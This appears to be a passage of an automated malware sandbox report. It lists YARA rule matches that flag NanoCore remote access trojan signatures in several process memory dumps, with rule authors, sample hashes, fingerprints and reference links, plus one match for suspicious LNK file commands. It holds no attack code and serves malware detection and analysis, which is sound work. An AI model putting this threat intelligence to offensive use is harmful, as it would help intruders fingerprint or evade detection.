Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
